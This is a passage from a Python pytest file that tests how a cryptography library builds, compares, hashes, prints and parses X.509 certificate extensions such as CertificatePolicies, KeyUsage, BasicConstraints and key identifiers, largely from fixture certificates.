x509.ObjectIdentifier("1.2.3"), [x509.UserNotice(None, "text")]
)
cp3 = x509.CertificatePolicies([pi3])
assert hash(cp) == hash(cp2)
assert hash(cp) != hash(cp3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificatePoliciesExtension(object):
    """Parse the certificatePolicies extension from fixture certificates."""

    def test_cps_uri_policy_qualifier(self, backend):
        # A policy whose only qualifier is a CPS URI string.
        cert = _load_cert(
            os.path.join("x509", "custom", "cp_cps_uri.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cp = cert.extensions.get_extension_for_oid(
            ExtensionOID.CERTIFICATE_POLICIES
        ).value
        assert cp == x509.CertificatePolicies(
            [
                x509.PolicyInformation(
                    x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
                    ["http://other.com/cps"],
                )
            ]
        )

    def test_user_notice_with_notice_reference(self, backend):
        # Mixed qualifiers: two CPS URIs plus a UserNotice carrying both a
        # NoticeReference (organization + notice numbers) and explicit text.
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "cp_user_notice_with_notice_reference.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        cp = cert.extensions.get_extension_for_oid(
            ExtensionOID.CERTIFICATE_POLICIES
        ).value
        assert cp == x509.CertificatePolicies(
            [
                x509.PolicyInformation(
                    x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
                    [
                        "http://example.com/cps",
                        "http://other.com/cps",
                        x509.UserNotice(
                            x509.NoticeReference("my org", [1, 2, 3, 4]),
                            "thing",
                        ),
                    ],
                )
            ]
        )

    def test_user_notice_with_explicit_text(self, backend):
        # UserNotice with explicit_text only (no NoticeReference).
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "cp_user_notice_with_explicit_text.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        cp = cert.extensions.get_extension_for_oid(
            ExtensionOID.CERTIFICATE_POLICIES
        ).value
        assert cp == x509.CertificatePolicies(
            [
                x509.PolicyInformation(
                    x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
                    [x509.UserNotice(None, "thing")],
                )
            ]
        )

    def test_user_notice_no_explicit_text(self, backend):
        # UserNotice with a NoticeReference but no explicit_text.
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "cp_user_notice_no_explicit_text.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        cp = cert.extensions.get_extension_for_oid(
            ExtensionOID.CERTIFICATE_POLICIES
        ).value
        assert cp == x509.CertificatePolicies(
            [
                x509.PolicyInformation(
                    x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
                    [
                        x509.UserNotice(
                            x509.NoticeReference("my org", [1, 2, 3, 4]), None
                        )
                    ],
                )
            ]
        )
class TestKeyUsage(object):
    """Constructor validation, property access, equality, hashing, and
    repr of the KeyUsage extension value."""

    def test_key_agreement_false_encipher_decipher_true(self):
        # encipher_only / decipher_only are only valid when key_agreement
        # is True; every combination below must be rejected.
        with pytest.raises(ValueError):
            x509.KeyUsage(
                digital_signature=False,
                content_commitment=False,
                key_encipherment=False,
                data_encipherment=False,
                key_agreement=False,
                key_cert_sign=False,
                crl_sign=False,
                encipher_only=True,
                decipher_only=False,
            )
        with pytest.raises(ValueError):
            x509.KeyUsage(
                digital_signature=False,
                content_commitment=False,
                key_encipherment=False,
                data_encipherment=False,
                key_agreement=False,
                key_cert_sign=False,
                crl_sign=False,
                encipher_only=True,
                decipher_only=True,
            )
        with pytest.raises(ValueError):
            x509.KeyUsage(
                digital_signature=False,
                content_commitment=False,
                key_encipherment=False,
                data_encipherment=False,
                key_agreement=False,
                key_cert_sign=False,
                crl_sign=False,
                encipher_only=False,
                decipher_only=True,
            )

    def test_properties_key_agreement_true(self):
        # NOTE(review): despite the name, this constructs key_agreement=False
        # and only checks the plain flag properties — confirm intent upstream.
        ku = x509.KeyUsage(
            digital_signature=True,
            content_commitment=True,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=False,
            key_cert_sign=True,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert ku.digital_signature is True
        assert ku.content_commitment is True
        assert ku.key_encipherment is False
        assert ku.data_encipherment is False
        assert ku.key_agreement is False
        assert ku.key_cert_sign is True
        assert ku.crl_sign is False

    def test_key_agreement_true_properties(self):
        # With key_agreement=True, encipher_only/decipher_only are readable.
        ku = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        assert ku.key_agreement is True
        assert ku.encipher_only is False
        assert ku.decipher_only is True

    def test_key_agreement_false_properties(self):
        # With key_agreement=False, reading encipher_only/decipher_only
        # raises ValueError.
        ku = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=False,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert ku.key_agreement is False
        with pytest.raises(ValueError):
            ku.encipher_only
        with pytest.raises(ValueError):
            ku.decipher_only

    def test_repr_key_agreement_false(self):
        ku = x509.KeyUsage(
            digital_signature=True,
            content_commitment=True,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=False,
            key_cert_sign=True,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert repr(ku) == (
            "<KeyUsage(digital_signature=True, content_commitment=True, key_en"
            "cipherment=False, data_encipherment=False, key_agreement=False, k"
            "ey_cert_sign=True, crl_sign=False, encipher_only=False, decipher_"
            "only=False)>"
        )

    def test_repr_key_agreement_true(self):
        ku = x509.KeyUsage(
            digital_signature=True,
            content_commitment=True,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=True,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert repr(ku) == (
            "<KeyUsage(digital_signature=True, content_commitment=True, key_en"
            "cipherment=False, data_encipherment=False, key_agreement=True, k"
            "ey_cert_sign=True, crl_sign=False, encipher_only=False, decipher_"
            "only=False)>"
        )

    def test_eq(self):
        ku = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        ku2 = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        assert ku == ku2

    def test_ne(self):
        ku = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        ku2 = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=False,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert ku != ku2
        assert ku != object()

    def test_hash(self):
        ku = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        ku2 = x509.KeyUsage(
            digital_signature=False,
            content_commitment=False,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=True,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=True,
        )
        ku3 = x509.KeyUsage(
            digital_signature=False,
            content_commitment=True,
            key_encipherment=False,
            data_encipherment=False,
            key_agreement=False,
            key_cert_sign=False,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        assert hash(ku) == hash(ku2)
        assert hash(ku) != hash(ku3)
class TestSubjectKeyIdentifier(object):
    """Properties, equality, hashing, and repr of SubjectKeyIdentifier."""

    def test_properties(self):
        raw = binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
        ski = x509.SubjectKeyIdentifier(raw)
        # digest and key_identifier are two views of the same bytes.
        assert ski.digest == raw
        assert ski.key_identifier == raw

    def test_repr(self):
        ski = x509.SubjectKeyIdentifier(
            binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
        )
        ext = x509.Extension(ExtensionOID.SUBJECT_KEY_IDENTIFIER, False, ski)
        assert repr(ext) == (
            "<Extension(oid=<ObjectIdentifier(oid=2.5.29.14, name=subjectK"
            "eyIdentifier)>, critical=False, value=<SubjectKeyIdentifier(d"
            "igest=b'\\t#\\x84\\x93\"0I\\x8b\\xc9\\x80\\xaa\\x80\\x98Eoo"
            "\\xf7\\xff:\\xc9')>)>"
        )

    def test_eq(self):
        hex_digest = b"092384932230498bc980aa8098456f6ff7ff3ac9"
        left = x509.SubjectKeyIdentifier(binascii.unhexlify(hex_digest))
        right = x509.SubjectKeyIdentifier(binascii.unhexlify(hex_digest))
        assert left == right

    def test_ne(self):
        left = x509.SubjectKeyIdentifier(
            binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
        )
        right = x509.SubjectKeyIdentifier(
            binascii.unhexlify(b"aa8098456f6ff7ff3ac9092384932230498bc980")
        )
        assert left != right
        assert left != object()

    def test_hash(self):
        hex_digest = b"092384932230498bc980aa8098456f6ff7ff3ac9"
        first = x509.SubjectKeyIdentifier(binascii.unhexlify(hex_digest))
        second = x509.SubjectKeyIdentifier(binascii.unhexlify(hex_digest))
        third = x509.SubjectKeyIdentifier(
            binascii.unhexlify(b"aa8098456f6ff7ff3ac9092384932230498bc980")
        )
        assert hash(first) == hash(second)
        assert hash(first) != hash(third)
class TestAuthorityKeyIdentifier(object):
    """Constructor validation, equality, hashing, and repr of
    AuthorityKeyIdentifier."""

    def test_authority_cert_issuer_not_generalname(self):
        # Issuer entries must be GeneralName instances, not plain strings.
        with pytest.raises(TypeError):
            x509.AuthorityKeyIdentifier(
                b"identifier", ["notname"], 3  # type:ignore[list-item]
            )

    def test_authority_cert_serial_number_not_integer(self):
        dirname = x509.DirectoryName(
            x509.Name(
                [
                    x509.NameAttribute(
                        x509.ObjectIdentifier("2.999.1"), "value1"
                    ),
                    x509.NameAttribute(
                        x509.ObjectIdentifier("2.999.2"), "value2"
                    ),
                ]
            )
        )
        with pytest.raises(TypeError):
            x509.AuthorityKeyIdentifier(
                b"identifier", [dirname], "notanint"  # type:ignore[arg-type]
            )

    def test_authority_issuer_none_serial_not_none(self):
        # issuer and serial must be supplied together or not at all.
        with pytest.raises(ValueError):
            x509.AuthorityKeyIdentifier(b"identifier", None, 3)

    def test_authority_issuer_not_none_serial_none(self):
        dirname = x509.DirectoryName(
            x509.Name(
                [
                    x509.NameAttribute(
                        x509.ObjectIdentifier("2.999.1"), "value1"
                    ),
                    x509.NameAttribute(
                        x509.ObjectIdentifier("2.999.2"), "value2"
                    ),
                ]
            )
        )
        with pytest.raises(ValueError):
            x509.AuthorityKeyIdentifier(b"identifier", [dirname], None)

    def test_authority_cert_serial_and_issuer_none(self):
        aki = x509.AuthorityKeyIdentifier(b"id", None, None)
        assert aki.key_identifier == b"id"
        assert aki.authority_cert_issuer is None
        assert aki.authority_cert_serial_number is None

    def test_authority_cert_serial_zero(self):
        # Serial number 0 is valid and must be distinguishable from None.
        dns = x509.DNSName("SomeIssuer")
        aki = x509.AuthorityKeyIdentifier(b"id", [dns], 0)
        assert aki.key_identifier == b"id"
        assert aki.authority_cert_issuer == [dns]
        assert aki.authority_cert_serial_number == 0

    def test_iter_input(self):
        # The issuer argument may be any iterable, not only a list.
        dirnames = [
            x509.DirectoryName(
                x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
            )
        ]
        aki = x509.AuthorityKeyIdentifier(b"digest", iter(dirnames), 1234)
        assert aki.authority_cert_issuer is not None
        assert list(aki.authority_cert_issuer) == dirnames

    def test_repr(self):
        dirname = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
        )
        aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
        assert repr(aki) == (
            "<AuthorityKeyIdentifier(key_identifier=b'digest', authority_"
            "cert_issuer=[<DirectoryName(value=<Name(CN=myCN)>)>], author"
            "ity_cert_serial_number=1234)>"
        )

    def test_eq(self):
        dirname = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
        )
        aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
        dirname2 = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
        )
        aki2 = x509.AuthorityKeyIdentifier(b"digest", [dirname2], 1234)
        assert aki == aki2

    def test_ne(self):
        # Inequality when any of key id, issuer, or serial differs.
        dirname = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
        )
        dirname5 = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "aCN")])
        )
        aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
        aki2 = x509.AuthorityKeyIdentifier(b"diges", [dirname], 1234)
        aki3 = x509.AuthorityKeyIdentifier(b"digest", None, None)
        aki4 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 12345)
        aki5 = x509.AuthorityKeyIdentifier(b"digest", [dirname5], 12345)
        assert aki != aki2
        assert aki != aki3
        assert aki != aki4
        assert aki != aki5
        assert aki != object()

    def test_hash(self):
        dirname = x509.DirectoryName(
            x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
        )
        aki1 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
        aki2 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
        aki3 = x509.AuthorityKeyIdentifier(b"digest", None, None)
        assert hash(aki1) == hash(aki2)
        assert hash(aki1) != hash(aki3)
class TestBasicConstraints(object):
    """Validation, equality, hashing, and repr of BasicConstraints."""

    def test_ca_not_boolean(self):
        with pytest.raises(TypeError):
            x509.BasicConstraints(
                ca="notbool", path_length=None  # type:ignore[arg-type]
            )

    def test_path_length_not_ca(self):
        """path_length is only meaningful when ca is True."""
        with pytest.raises(ValueError):
            x509.BasicConstraints(ca=False, path_length=0)

    def test_path_length_not_int(self):
        for bad_length in (1.1, "notint"):
            with pytest.raises(TypeError):
                x509.BasicConstraints(
                    ca=True, path_length=bad_length  # type:ignore[arg-type]
                )

    def test_path_length_negative(self):
        with pytest.raises(TypeError):
            x509.BasicConstraints(ca=True, path_length=-1)

    def test_repr(self):
        bc = x509.BasicConstraints(ca=True, path_length=None)
        assert repr(bc) == ("<BasicConstraints(ca=True, path_length=None)>")

    def test_hash(self):
        bc = x509.BasicConstraints(ca=True, path_length=None)
        same = x509.BasicConstraints(ca=True, path_length=None)
        different = x509.BasicConstraints(ca=True, path_length=0)
        assert hash(bc) == hash(same)
        assert hash(bc) != hash(different)

    def test_eq(self):
        bc = x509.BasicConstraints(ca=True, path_length=None)
        same = x509.BasicConstraints(ca=True, path_length=None)
        assert bc == same

    def test_ne(self):
        bc = x509.BasicConstraints(ca=True, path_length=None)
        other_length = x509.BasicConstraints(ca=True, path_length=1)
        not_ca = x509.BasicConstraints(ca=False, path_length=None)
        assert bc != other_length
        assert bc != not_ca
        assert bc != object()
class TestExtendedKeyUsage(object):
    """Construction, iteration, equality, hashing, and repr of
    ExtendedKeyUsage."""

    def test_not_all_oids(self):
        # Every entry must be an ObjectIdentifier.
        with pytest.raises(TypeError):
            x509.ExtendedKeyUsage(["notoid"])  # type:ignore[list-item]

    def test_iter_len(self):
        eku = x509.ExtendedKeyUsage(
            [
                x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
                x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
            ]
        )
        assert len(eku) == 2
        # Raw dotted OIDs compare equal to the well-known constants.
        assert list(eku) == [
            ExtendedKeyUsageOID.SERVER_AUTH,
            ExtendedKeyUsageOID.CLIENT_AUTH,
        ]

    def test_iter_input(self):
        # Any iterable of OIDs is accepted, not only a list.
        usages = [
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
        ]
        aia = x509.ExtendedKeyUsage(iter(usages))
        assert list(aia) == usages

    def test_repr(self):
        eku = x509.ExtendedKeyUsage(
            [
                x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
                x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
            ]
        )
        assert repr(eku) == (
            "<ExtendedKeyUsage([<ObjectIdentifier(oid=1.3.6.1.5.5.7.3.1, name="
            "serverAuth)>, <ObjectIdentifier(oid=1.3.6.1.5.5.7.3.2, name=clien"
            "tAuth)>])>"
        )

    def test_eq(self):
        eku = x509.ExtendedKeyUsage(
            [x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
        )
        eku2 = x509.ExtendedKeyUsage(
            [x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
        )
        assert eku == eku2

    def test_ne(self):
        eku = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6")])
        eku2 = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6.1")])
        assert eku != eku2
        assert eku != object()

    def test_hash(self):
        eku = x509.ExtendedKeyUsage(
            [x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
        )
        eku2 = x509.ExtendedKeyUsage(
            [x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
        )
        eku3 = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6")])
        assert hash(eku) == hash(eku2)
        assert hash(eku) != hash(eku3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestExtensions(object):
    """Behavior of the Extensions collection: lookup, iteration, indexing,
    duplicate/unsupported extension handling, and repr."""

    def test_no_extensions(self, backend):
        cert = _load_cert(
            os.path.join("x509", "verisign_md2_root.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions
        assert len(ext) == 0
        assert list(ext) == []
        with pytest.raises(x509.ExtensionNotFound) as exc:
            ext.get_extension_for_oid(ExtensionOID.BASIC_CONSTRAINTS)
        # The exception carries the OID that was not found.
        assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS

    def test_one_extension(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "basic_constraints_not_critical.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        extensions = cert.extensions
        ext = extensions.get_extension_for_oid(ExtensionOID.BASIC_CONSTRAINTS)
        assert ext is not None
        assert ext.value.ca is False

    def test_duplicate_extension(self, backend):
        # A certificate with the same extension twice fails at parse time.
        cert = _load_cert(
            os.path.join("x509", "custom", "two_basic_constraints.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        with pytest.raises(x509.DuplicateExtension) as exc:
            cert.extensions
        assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS

    def test_unsupported_critical_extension(self, backend):
        # Unknown extensions are surfaced as UnrecognizedExtension values
        # (accessible via .value.value) rather than raising.
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "unsupported_extension_critical.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            x509.ObjectIdentifier("1.2.3.4")
        )
        assert ext.value.value == b"value"

    @pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
    def test_unsupported_extension(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "unsupported_extension_2.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        extensions = cert.extensions
        assert len(extensions) == 2
        assert extensions[0].critical is False
        assert extensions[0].oid == x509.ObjectIdentifier(
            "1.3.6.1.4.1.41482.2"
        )
        assert extensions[0].value == x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.3.6.1.4.1.41482.2"),
            b"1.3.6.1.4.1.41482.1.2",
        )
        assert extensions[1].critical is False
        assert extensions[1].oid == x509.ObjectIdentifier(
            "1.3.6.1.4.1.45724.2.1.1"
        )
        assert extensions[1].value == x509.UnrecognizedExtension(
            x509.ObjectIdentifier("1.3.6.1.4.1.45724.2.1.1"), b"\x03\x02\x040"
        )

    def test_no_extensions_get_for_class(self, backend):
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        exts = cert.extensions
        with pytest.raises(x509.ExtensionNotFound) as exc:
            exts.get_extension_for_class(x509.IssuerAlternativeName)
        assert exc.value.oid == ExtensionOID.ISSUER_ALTERNATIVE_NAME

    def test_unrecognized_extension_for_class(self):
        # UnrecognizedExtension has no fixed OID, so class lookup is invalid.
        exts = x509.Extensions([])
        with pytest.raises(TypeError):
            exts.get_extension_for_class(x509.UnrecognizedExtension)

    def test_indexing(self, backend):
        # Supports negative indices and extended slicing.
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        exts = cert.extensions
        assert exts[-1] == exts[7]
        assert exts[2:6:2] == [exts[2], exts[4]]

    def test_one_extension_get_for_class(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "basic_constraints_not_critical.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_class(x509.BasicConstraints)
        assert ext is not None
        assert isinstance(ext.value, x509.BasicConstraints)

    def test_repr(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "basic_constraints_not_critical.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        assert repr(cert.extensions) == (
            "<Extensions([<Extension(oid=<ObjectIdentifier(oid=2.5.29.19, name"
            "=basicConstraints)>, critical=False, value=<BasicConstraints(ca=F"
            "alse, path_length=None)>)>])>"
        )
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestBasicConstraintsExtension(object):
    """Parse the basicConstraints extension from fixture certificates."""

    def test_ca_true_pathlen_6(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "PKITS_data", "certs", "pathLenConstraint6CACert.crt"
            ),
            x509.load_der_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.BASIC_CONSTRAINTS
        )
        assert ext is not None
        assert ext.critical is True
        assert ext.value.ca is True
        assert ext.value.path_length == 6

    def test_path_length_zero(self, backend):
        # path_length of 0 must parse as 0, not be confused with None.
        cert = _load_cert(
            os.path.join("x509", "custom", "bc_path_length_zero.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.BASIC_CONSTRAINTS
        )
        assert ext is not None
        assert ext.critical is True
        assert ext.value.ca is True
        assert ext.value.path_length == 0

    def test_ca_true_no_pathlen(self, backend):
        cert = _load_cert(
            os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
            x509.load_der_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.BASIC_CONSTRAINTS
        )
        assert ext is not None
        assert ext.critical is True
        assert ext.value.ca is True
        assert ext.value.path_length is None

    def test_ca_false(self, backend):
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.BASIC_CONSTRAINTS
        )
        assert ext is not None
        assert ext.critical is True
        assert ext.value.ca is False
        assert ext.value.path_length is None

    def test_no_basic_constraints(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509",
                "PKITS_data",
                "certs",
                "ValidCertificatePathTest1EE.crt",
            ),
            x509.load_der_x509_certificate,
            backend,
        )
        with pytest.raises(x509.ExtensionNotFound):
            cert.extensions.get_extension_for_oid(
                ExtensionOID.BASIC_CONSTRAINTS
            )

    def test_basic_constraint_not_critical(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "basic_constraints_not_critical.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.BASIC_CONSTRAINTS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value.ca is False
class TestSubjectKeyIdentifierExtension(object):
    """Parse subjectKeyIdentifier from certificates and derive it from
    public keys of various algorithms via from_public_key()."""

    @pytest.mark.requires_backend_interface(interface=RSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_subject_key_identifier(self, backend):
        cert = _load_cert(
            os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
            x509.load_der_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = ext.value
        assert ext is not None
        assert ext.critical is False
        assert ski.digest == binascii.unhexlify(
            b"580184241bbc2b52944a3da510721451f5af3ac9"
        )

    @pytest.mark.requires_backend_interface(interface=RSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_no_subject_key_identifier(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "bc_path_length_zero.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        with pytest.raises(x509.ExtensionNotFound):
            cert.extensions.get_extension_for_oid(
                ExtensionOID.SUBJECT_KEY_IDENTIFIER
            )

    @pytest.mark.requires_backend_interface(interface=RSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_from_rsa_public_key(self, backend):
        # The derived SKI must match the one embedded in the certificate.
        cert = _load_cert(
            os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
            x509.load_der_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
        assert ext.value == ski

    @pytest.mark.requires_backend_interface(interface=DSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_from_dsa_public_key(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
        assert ext.value == ski

    @pytest.mark.requires_backend_interface(interface=DSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_invalid_bit_string_padding_from_public_key(self, backend):
        # Feed a malformed SPKI (bad BIT STRING padding) through a stub key
        # object; derivation must reject it.
        data = load_vectors_from_file(
            filename=os.path.join(
                "asymmetric",
                "DER_Serialization",
                "dsa_public_key_invalid_bit_string.der",
            ),
            loader=lambda data: data.read(),
            mode="rb",
        )
        pretend_key = pretend.stub(public_bytes=lambda x, y: data)
        with pytest.raises(ValueError):
            _key_identifier_from_public_key(pretend_key)

    @pytest.mark.requires_backend_interface(interface=DSABackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_no_optional_params_allowed_from_public_key(self, backend):
        data = load_vectors_from_file(
            filename=os.path.join(
                "asymmetric",
                "DER_Serialization",
                "dsa_public_key_no_params.der",
            ),
            loader=lambda data: data.read(),
            mode="rb",
        )
        pretend_key = pretend.stub(public_bytes=lambda x, y: data)
        key_identifier = _key_identifier_from_public_key(pretend_key)
        assert key_identifier == binascii.unhexlify(
            b"24c0133a6a492f2c48a18c7648e515db5ac76749"
        )

    @pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_from_ec_public_key(self, backend):
        _skip_curve_unsupported(backend, ec.SECP384R1())
        cert = _load_cert(
            os.path.join("x509", "ecdsa_root.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
        assert ext.value == ski

    @pytest.mark.supported(
        only_if=lambda backend: backend.ed25519_supported(),
        skip_message="Requires OpenSSL with Ed25519 support",
    )
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_from_ed25519_public_key(self, backend):
        cert = _load_cert(
            os.path.join("x509", "ed25519", "root-ed25519.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
        assert ext.value == ski

    @pytest.mark.supported(
        only_if=lambda backend: backend.ed448_supported(),
        skip_message="Requires OpenSSL with Ed448 support",
    )
    @pytest.mark.requires_backend_interface(interface=X509Backend)
    def test_from_ed448_public_key(self, backend):
        cert = _load_cert(
            os.path.join("x509", "ed448", "root-ed448.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_KEY_IDENTIFIER
        )
        ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
        assert ext.value == ski
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestKeyUsageExtension(object):
    """Parse the keyUsage extension from fixture certificates."""

    def test_no_key_usage(self, backend):
        cert = _load_cert(
            os.path.join("x509", "verisign_md2_root.pem"),
            x509.load_pem_x509_certificate,
            backend,
